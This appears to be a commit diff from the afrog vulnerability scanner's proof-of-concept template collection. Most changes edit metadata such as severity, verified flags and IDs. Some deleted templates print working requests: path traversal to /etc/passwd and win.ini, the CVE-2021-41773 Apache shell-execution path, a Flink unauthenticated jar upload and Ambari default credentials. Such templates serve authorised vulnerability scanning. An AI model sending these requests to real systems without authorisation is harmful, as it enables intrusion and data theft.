STRLCPY/afrog

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/a-fingerprinting/panel-detect.yaml

		skipped 46 lines
47	47		- '"panabit-ixcache" != "" && response.status == 200 && response.body.bcontains(b"<title>iXCache</title>")'
48	48		- '"panabit-gateway" != "" && response.status == 200 && response.body.bcontains(b"<span>Powered by OFBiz</span>")'
49	49		- '"rabbitmq-dashboard" != "" && response.status == 200 && response.body.bcontains(b"<title>RabbitMQ Management</title>")'
	50	+	- '"cobbler-webgui" != "" && response.status == 200 && response.body.bcontains(b"<title>Cobbler Web Interface</title>")'
50	51
51	52		r1:
52	53		request:
		skipped 36 lines
89	90		- '"panabit-ixcache" != "" && response.status == 200 && response.body.bcontains(b"<title>iXCache</title>")'
90	91		- '"panabit-gateway" != "" && response.status == 200 && response.body.bcontains(b"<span>Powered by OFBiz</span>")'
91	92		- '"rabbitmq-dashboard" != "" && response.status == 200 && response.body.bcontains(b"<title>RabbitMQ Management</title>")'
	93	+	- '"cobbler-webgui" != "" && response.status == 200 && response.body.bcontains(b"<title>Cobbler Web Interface</title>")'
92	94
93	95		expression: r0() \|\| r1()

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/c-unauthorized/nifi-api-unauthorized-access.yaml

		skipped 4 lines
5	5		author: wulalalaaa(https://github.com/wulalalaaa)
6	6		severity: high
7	7		verified: false
	8	+	description: Apache NiFi Api未授权访问导致命令执行
	9	+	reference:
	10	+	- https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
8	11
9	12		rules:
10	13		r0:
		skipped 6 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/360tianqing-gettablessize-databaseinformationleakage.yaml pocs/afrog-pocs/e-vulnerability/360tianqing-gettablessize-database-info-leakage.yaml

1		-	id: 360tianqing-gettablessize-databaseinformationleakage
	1	+	id: 360tianqing-gettablessize-database-info-leakage
2	2
3	3		info:
4	4		name: 360天擎 gettablessize 数据库信息泄露漏洞
5		-	author: daffainfo
6		-	severity: critical
7		-	description: 360天擎存在未授权越权访问，造成敏感信息泄露 title="360新天擎"
	5	+	author: daffainfo,你是猪
	6	+	severity: medium
	7	+	verified: true
	8	+	description: 360天擎存在未授权越权访问，造成敏感信息泄露 title="360新天擎" app="360天擎终端安全管理系统"
8	9		reference:
9	10		- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/360%E5%A4%A9%E6%93%8E%20gettablessize%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
10	11
		skipped 2 lines
13	14		request:
14	15		method: GET
15	16		path: /api/dbstat/gettablessize
16		-	expression: response.status == 200 && response.body.bcontains(b'"schema_name":') && response.body.bcontains(b'"reason":')
	17	+	expression: response.status == 200 && response.body.bcontains(b'"schema_name":') && response.body.bcontains(b'"reason":') && response.body.bcontains(b'"table_name":')
17	18		expression: r0()

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/74cms-ajax-personal-controller-class-php-sqlinject.yaml

1	1		id: 74cms-ajax-personal-controller-class-php-sqlinject
2	2
3	3		info:
4		-	name: 74cms 5.0.1 SQL注入漏洞
	4	+	name: 74 CMS 5.0.1 SQL 注入漏洞
5	5		author: jinqi
6		-	severity: critical
7		-	description: 74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入漏洞
	6	+	severity: high
	7	+	verified: false
	8	+	description: 74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入漏洞 app="骑士-74CMS"
8	9		reference:
9	10		- https://www.cnblogs.com/TJWater/p/14780067.html
10	11
		skipped 8 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/74cms-sqli-1.yaml

1	1		id: 74cms-sqli-1
2	2
3	3		info:
4		-	name: 74cms-sqli-1
	4	+	name: 74 CMS SQL 注入漏洞
5	5		author: betta
6		-	severity: critical
7		-	description: 74cms-sqli-1
	6	+	severity: high
	7	+	verified: true
	8	+	description: 74cms-sqli-1 app="骑士-74CMS"
8	9		reference:
9	10		- https://www.uedbox.com/post/29340
10	11
		skipped 13 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/74cms-sqli-2.yaml

1	1		id: 74cms-sqli-2
2	2
3	3		info:
4		-	name: 74cms-sqli-2
	4	+	name: 74 CMS SQL 注入漏洞
5	5		author: rexus
6		-	severity: critical
7		-	description: 74cms-sqli-2
	6	+	severity: high
	7	+	verified: true
	8	+	description: 74cms-sqli-2 app="骑士-74CMS"
8	9		reference:
9	10		- https://www.uedbox.com/post/30019/
10	11
		skipped 9 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/acti-video-read-file.yaml

		skipped 3 lines
4	4		name: ACTI 视频监控 images 任意文件读取漏洞
5	5		author: zan8in
6	6		severity: high
	7	+	verified: true
7	8		description: \|
8	9		ACTI 视频监控存在任意文件读取漏洞
9	10		app="ACTi-视频监控"
		skipped 11 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/alibaba-canal-config-leak.yaml

		skipped 2 lines
3	3		info:
4	4		name: Alibaba Canal config 云密钥信息泄露漏洞
5	5		author: zan8in
6		-	severity: critical
	6	+	severity: high
	7	+	verified: true
7	8		description: \|
8	9		由于/api/v1/canal/config 未进行权限验证可直接访问，导致账户密码、accessKey、secretKey等一系列敏感信息泄露
9	10		title="Canal Admin"
		skipped 10 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/amtt-hiboss-server-ping-rce.yaml

		skipped 3 lines
4	4		name: Amtt hiboss Server Ping RCE
5	5		author: YekkoY
6	6		severity: high
	7	+	verified: false
7	8
8	9		set:
9	10		r2: randomLowercase(10)
		skipped 13 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/anyproxy-directory-traversal.yaml

1	-	id: anyproxy-directory-traveral
2	-
3	-	info:
4	-	name: Anyproxy 目录穿越导致任意文件读取
5	-	author: zan8in
6	-	severity: critical
7	-	description: \|
8	-	Alibaba AnyProxy 低版本存在任意文件读取，通过漏洞，攻击者可以获取服务器敏感信息
9	-	fofa: Anyproxy
10	-	reference:
11	-	- https://github.com/alibaba/anyproxy/issues/391
12	-	- http://wiki.peiqi.tech/wiki/webapp/Alibaba%20AnyProxy/Alibaba%20AnyProxy%20fetchBody%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
13	-
14	-	rules:
15	-	r0:
16	-	request:
17	-	method: GET
18	-	path: /fetchBody?id=1/../../../../../../../../etc/passwd
19	-	expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
20	-	expression: r0()

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/apache-ambari-default-password.yaml

1	-	id: apache-ambari-default-password
2	-
3	-	info:
4	-	name: apache-ambari-default-password
5	-	author: wulalalaaa(https://github.com/wulalalaaa)
6	-	severity: critical
7	-	description: apache-ambari-default-password
8	-	reference:
9	-	- https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide
10	-
11	-	rules:
12	-	r0:
13	-	request:
14	-	method: GET
15	-	path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
16	-	headers:
17	-	Authorization: Basic YWRtaW46YWRtaW4=
18	-	expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR")
19	-	expression: r0()
20	-

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/apache-flink-upload-rce.yaml

1	-	id: apache-flink-upload-rce
2	-
3	-	info:
4	-	name: apache-flink-upload-rce
5	-	author: timwhite
6	-	severity: critical
7	-	description: apache-flink-upload-rce
8	-	reference:
9	-	- https://github.com/LandGrey/flink-unauth-rce
10	-
11	-	set:
12	-	r1: randomLowercase(8)
13	-	r2: randomLowercase(4)
14	-	rules:
15	-	r0:
16	-	request:
17	-	method: GET
18	-	path: /jars
19	-	follow_redirects: true
20	-	expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"address") && response.body.bcontains(b"files")
21	-	r1:
22	-	request:
23	-	method: POST
24	-	path: /jars/upload
25	-	headers:
26	-	Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3
27	-	body: "\
28	-	--8ce4b16b22b58894aa86c421e8759df3\r\n\
29	-	Content-Disposition: form-data; name=\"jarfile\";filename=\"{{r2}}.jar\"\r\n\
30	-	Content-Type:application/octet-stream\r\n\
31	-	\r\n\
32	-	{{r1}}\r\n\
33	-	--8ce4b16b22b58894aa86c421e8759df3--\r\n\
34	-	"
35	-	follow_redirects: true
36	-	expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
37	-	output:
38	-	search: '"(?P<filen>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))".bsubmatch(response.body)'
39	-	filen: search["filen"]
40	-	r2:
41	-	request:
42	-	method: DELETE
43	-	path: /jars/{{filen}}
44	-	follow_redirects: true
45	-	expression: response.status == 200
46	-	expression: r0() && r1() && r2()

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/apache-httpd-cve-2021-41773-rce.yaml

1	-	id: apache-httpd-cve-2021-41773-rce
2	-
3	-	info:
4	-	name: apache-httpd-cve-2021-41773-rce
5	-	author: B1anda0(https://github.com/B1anda0)
6	-	severity: critical
7	-	description: apache-httpd-cve-2021-41773-rce
8	-	reference:
9	-	- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
10	-
11	-	set:
12	-	r1: randomInt(800000000, 1000000000)
13	-	r2: randomInt(800000000, 1000000000)
14	-	rules:
15	-	r0:
16	-	request:
17	-	method: POST
18	-	path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
19	-	body: echo;expr {{r1}} + {{r2}}
20	-	expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
21	-	expression: r0()

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/apache-nifi-api-unauthorized-access.yaml

1	-	id: apache-nifi-api-unauthorized-access
2	-
3	-	info:
4	-	name: Apache NiFi Api未授权访问导致命令执行
5	-	author: wulalalaaa(https://github.com/wulalalaaa)
6	-	severity: critical
7	-	description: Apache NiFi Api未授权访问导致命令执行
8	-	reference:
9	-	- https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
10	-
11	-	rules:
12	-	r0:
13	-	request:
14	-	method: GET
15	-	path: /nifi-api/flow/current-user
16	-	follow_redirects: true
17	-	expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
18	-	expression: r0()

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/AspCMS-commentList.asp-SQL.yaml pocs/afrog-pocs/e-vulnerability/aspcms-commentlist-sql-injection.yaml

1		-	id: AspCMS-commentList.asp-SQL
	1	+	id: aspcms-commentlist-sql-injection
2	2
3	3		info:
4	4		name: AspCMS commentList.asp SQL注入漏洞
5	5		author: daffainfo
6		-	severity: critical
	6	+	severity: high
	7	+	verified: false
7	8		description: AspCMS commentList.asp 存在SQL注入漏洞，攻击者通过漏洞可以获取管理员md5的密码 app="ASPCMS"
8	9		reference:
9	10		- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/AspCMS%20commentList.asp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
		skipped 8 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/AVCON6-download.action-Downloadanyfile.yaml pocs/afrog-pocs/e-vulnerability/avcon6-download.action-download-file-read.yaml

1		-	id: AVCON6-download.action-Downloadanyfile
	1	+	id: avcon6-download.action-download-file-read
2	2
3	3		info:
4	4		name: AVCON6 系统管理平台 download.action 任意文件下载漏洞
5	5		author: daffainfo
6		-	severity: critical
	6	+	severity: high
	7	+	verified: false
7	8		description: AVCON6 系统管理平台 download.action 存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器任意文件 app="AVCON-6"
8	9		reference:
9	10		- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
		skipped 8 lines
18	19		request:
19	20		method: GET
20	21		path: /download.action?filename=../../../../../../Windows/win.ini
21		-	expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
	22	+	expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
22	23		expression: linux0() \|\| windows0()

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/AVCON6-org_execl_download.action-Downloadanyfile.yaml pocs/afrog-pocs/e-vulnerability/avcon6-org-execl-file-download.yaml

1		-	id: AVCON6-org_execl_download.action-Downloadanyfile
	1	+	id: avcon6-org-execl-file-download
2	2
3	3		info:
4	4		name: AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞
5	5		author: daffainfo
6		-	severity: critical
	6	+	severity: high
	7	+	verified: false
7	8		description: AVCON6 系统管理平台 org_execl_download.action存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器任意文件 app="AVCON-6"
8	9		reference:
9	10		- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20org_execl_download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
		skipped 8 lines
18	19		request:
19	20		method: GET
20	21		path: /org_execl_download.action?filename=../../../../../../../../../../../../../Windows/win.ini
21		-	expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
	22	+	expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
22	23		expression: linux0() \|\| windows0()

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/bohuangwanglong-cmd-php-rce.yaml

		skipped 3 lines
4	4		name: 博华网龙防火墙 cmd.php 远程命令执行漏洞(OEM)
5	5		author: zan8in
6	6		severity: critical
	7	+	verified: true
7	8		description: \|
8	9		博华网龙防火墙 cmd.php 过滤不足，导致命令拼接执行远程命令
9	10		"博华网龙防火墙"
		skipped 15 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/bohuawanglong-users-xml-password-leak.yaml

		skipped 3 lines
4	4		name: 博华网龙防火墙 users.xml 未授权访问
5	5		author: zan8in
6	6		severity: high
	7	+	verified: true
7	8		description: \|
8	9		博华网龙防火墙 users.xml文件可被任意用户读取，其中包含登录的账号密码
9	10		"博华网龙防火墙"
		skipped 10 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/BSPHP-index.php-Unauthorized-access.yaml pocs/afrog-pocs/e-vulnerability/bsphp-nauthorized-access.yaml

1		-	id: BSPHP-index.php-Unauthorized-access
	1	+	id: bsphp-nauthorized-access
2	2
3	3		info:
4	4		name: BSPHP index.php 未授权访问信息泄露漏洞
5	5		author: daffainfo
6	6		severity: medium
	7	+	verified: true
7	8		description: \|
8	9		BSPHP 存在未授权访问泄露用户IP和账户名信息
9	10		fofa-query: "BSPHP"
		skipped 10 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/byzoro-smart-importhtml-rce.yaml

1		-	id: byzoro-smart-importhtml-rce.yaml
	1	+	id: byzoro-smart-importhtml-rce
2	2
3	3		info:
4	4		name: 百卓 Smart importhtml.php 远程命令执行漏洞
5	5		author: zan8in
6	6		severity: critical
	7	+	verified: true
7	8		description: \|
8	9		百卓 importhtml.php文件sql语句无过滤，通过Sql语句可远程命令执行
9	10		title="Smart管理平台"
		skipped 17 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/cacti-weathermap-file-write.yaml

		skipped 3 lines
4	4		name: Cacti Weathermap File Write
5	5		author: whynot(https://github.com/notwhy)
6	6		severity: high
	7	+	verified: true
7	8
8	9		rules:
9	10		r0:
		skipped 11 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/chinaunicom-modem-default-password.yaml

		skipped 2 lines
3	3		info:
4	4		name: 中国联通 modem 默认密码
5	5		author: daffainfo
6		-	severity: critical
7		-	description: 中国联通 modem默认密码
	6	+	severity: high
	7	+	verified: false
	8	+	description: 中国联通 modem 默认密码
8	9
9	10		rules:
10	11		r0:
		skipped 8 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/clickhouse-api-unauth.yaml

		skipped 3 lines
4	4		name: ClickHouse API 数据库接口未授权访问漏洞 8123端口
5	5		author: zan8in
6	6		severity: high
	7	+	verified: false
7	8		description: \|
8	9		ClickHouse API 数据库接口存在未授权访问漏洞，攻击者通过漏洞可以执行任意SQL命令获取数据库数据
9	10		ClickHouse 8123端口
		skipped 19 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/CmsEasy-crossall_act.php-SQL.yaml pocs/afrog-pocs/e-vulnerability/cmseasy-crossall-act-php-sql-injection.yaml

1		-	id: CmsEasy-crossall_act.php-SQL
	1	+	id: cmseasy-crossall-act-php-sql-injection
2	2
3	3		info:
4	4		name: CmsEasy crossall_act.php SQL注入漏洞
5	5		author: daffainfo
6		-	severity: critical
	6	+	severity: high
	7	+	verified: true
7	8		description: CmsEasy 存在SQL注入漏洞，通过文件 service.php 加密SQL语句执行即可执行任意SQL命令。影响版本:CmsEasy V7.7.5_20210919 body="cmseasyedit"
8	9		reference:
9	10		- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/CmsEasy%20crossall_act.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
10	11
11		-	set:
12		-	hosturl: request.url
13	12		rules:
14	13		r0:
15	14		request:
		skipped 4 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/cobbler-default-login.yaml

		skipped 3 lines
4	4		name: Cobbler Default Login
5	5		author: c-sh0
6	6		severity: high
7		-	description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
	7	+	verified: true
	8	+	description: Cobbler default login credentials for the testing module (testing/testing) were discovered. fofa "Cobbler"
8	9		reference:
9	10		- https://seclists.org/oss-sec/2022/q1/146
10	11		- https://github.com/cobbler/cobbler/issues/2307
		skipped 54 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/cobbler-exposed-directory.yaml

		skipped 3 lines
4	4		name: Exposed Cobbler Directories
5	5		author: c-sh0
6	6		severity: medium
	7	+	verified: false
7	8		description: Searches for exposed Cobbler Directories
8	9
9	10		rules:
		skipped 11 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/cobbler-webgui.yaml

		skipped 3 lines
4	4		name: Cobbler WebGUI Detection
5	5		author: c-sh0
6	6		severity: info
	7	+	verified: true
7	8		description: \|
8	9		Detection of Cobbler WebGUI
9	10		shodan-query: http.title:"Cobbler Web Interface"
		skipped 9 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/consul-rexec-rce.yaml

		skipped 3 lines
4	4		name: Consul rexec RCE
5	5		author: imlonghao(https://imlonghao.com/)
6	6		severity: high
	7	+	verified: false
7	8
8	9		rules:
9	10		r0:
		skipped 7 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/consul-service-rce.yaml

		skipped 3 lines
4	4		name: Consul Service RCE
5	5		author: imlonghao(https://imlonghao.com/)
6	6		severity: high
	7	+	verified: false
7	8
8	9		rules:
9	10		r0:
		skipped 6 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/couchdb-adminparty.yaml pocs/afrog-pocs/e-vulnerability/couchdb-admin-party.yaml

1		-	id: couchdb-adminparty
	1	+	id: couchdb-admin-party
2	2
3	3		info:
4	4		name: CouchDB Admin Party
5	5		author: organiccrap
6	6		severity: high
	7	+	verified: false
7	8		description: Requests made against CouchDB are done in the context of an admin user.
8	9
9	10		rules:
		skipped 6 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/CxCMS-Resource.ashx-Arbitrary-File-Read-Vulnerability.yaml pocs/afrog-pocs/e-vulnerability/cxcms-arbitrary-file-read.yaml

1		-	id: CxCMS-Resource.ashx-Arbitrary-File-Read-Vulnerability
	1	+	id: cxcms-arbitrary-file-read
2	2
3	3		info:
4	4		name: CxCMS Resource.ashx 任意文件读取漏洞
5	5		author: daffainfo
6		-	severity: critical
	6	+	severity: high
	7	+	verified: true
7	8		description: \|
8	9		CxCMS存在任意文件读取，由于/Sys/Handler/Resource.ashx页面 _FilePath参数过滤不严，导致可以读取系统敏感文件。
9	10		fofa-query: "Powered by CxCms"
		skipped 10 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/f-CNVD/2018/CNVD-2018-16876.yaml

		skipped 2 lines
3	3		info:
4	4		name: Cobbler任意文件读取漏洞
5	5		author: rain
6		-	severity: medium
	6	+	severity: high
	7	+	verified: false
7	8		description: \|
8	9		Cobbler是一款网络安装服务器套件，它能够快速建立Linux网络安装环境。
9	10		Cobbler 2.6.11-1版本中存在任意文件读取漏洞。攻击者可利用该漏洞读取任意文件。
		skipped 15 lines

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/f-CNVD/2020/CNVD-2020-62853.yaml

1	-	id: CNVD-2020-62853
2	-
3	-	info:
4	-	name: 360 天擎终端安全管理系统越权访问漏洞
5	-	author: 你是猪
6	-	severity: medium
7	-	description: \|
8	-	FOFA：app="360天擎终端安全管理系统"
9	-	reference:
10	-	- https://blog.51cto.com/u_9691128/4295047
11	-
12	-	rules:
13	-	r0:
14	-	request:
15	-	method: GET
16	-	path: /api/dbstat/gettablessize
17	-	expression: response.status == 200 && response.body.bcontains(b'"schema_name":')&& response.body.bcontains(b'"table_name":')
18	-	expression: r0()
19	-
20	-

update poc